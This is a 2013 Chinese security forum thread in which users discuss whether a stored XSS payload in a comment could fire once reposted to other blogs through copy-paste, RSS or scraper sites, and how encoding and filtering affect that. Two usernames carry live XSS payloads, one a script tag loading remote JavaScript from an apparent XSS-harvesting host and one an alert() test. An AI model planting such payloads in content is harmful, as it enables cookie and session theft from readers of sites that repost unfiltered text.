关于转载问题思考
he1renyagao (<script src=http://xsserme.sinaapp.com/03h4FW?1383289085></script>) | 2013-11-01 14:39
rt
如果在zone的一个话题,评论中插入一个xss,虽然在zone中不会被触发,但如果被某些XX转载之后,会不会在对方的blog触发呢?
请对以上问题探讨:转载的方式? 对方编码? 对方编辑器的过滤情况?
相关讨论:
1#
xsjswt | 2013-11-01 14:46
你想多了,如果在乌云都没触发,在其他地方要触发就更加难了
2#
xsser (十根阳具有长短!!) | 2013-11-01 14:46
@xsjswt 你这话我就不爱听了 乌云是拦咩
3#
xsser (十根阳具有长短!!) | 2013-11-01 14:46
@xsjswt ctrl+c可能是有问题 rss可能也有问题
4#
xsser (十根阳具有长短!!) | 2013-11-01 14:47
关注下有个人发淘宝的xss把圆通快递给x了的案例 乌云上有
5#
he1renyagao (<script src=http://xsserme.sinaapp.com/03h4FW?1383289085></script>) | 2013-11-01 15:00
@xsser 以后我每个贴都回复....... > . <
6#
老道 | 2013-11-01 15:23
这个完全有可能。最近在做一个rss抓取内容的东西,就在考虑这个问题
7#
叽叽歪歪 (?) | 2013-11-01 15:52
@核攻击 整那么多zone的帖子过去,会不会中招啊。
8#
xsjswt | 2013-11-01 15:55
@xsser 乌云都没x出来,下面肯定实体化了,那别的网站爬去,总不可能去实体化吧。了不起了吧>再实体化一次成了& gt;,都不可能xss对吧
9#
核攻击 (统治全球,奴役全人类!毁灭任何胆敢阻拦的有机生物!) | 2013-11-02 09:24
是的,这个可以触发,像之前很多采集站,采集之后没有过滤,导致各种跨站。
关于我的站嘛,寡人直接复制的Html源码,人工过滤哟,免疫……
10#
Jumbo | 2013-11-02 11:16
虽然没在乌云触发,可是不代表别站的过滤和编码等问题
11#
liyang (<script>alert("xss")</script>) | 2013-11-02 11:17
有吧 不是有的站就是在百度搜索的时候把百度跨了么~~我记得是标题还是哪呢
12#
7z1 | 2013-11-22 22:25
有案例 ,但不是乌云转去的, 是个人独立博客日志转载, 某挖掘php漏洞大牛中过招~~ 哈哈
13#
回复此人感谢
Fu2k | 2013-11-22 22:32
所以应该用核总的方法 直接人工过滤,把一切都扼杀在摇篮中。
留言评论(旧系统):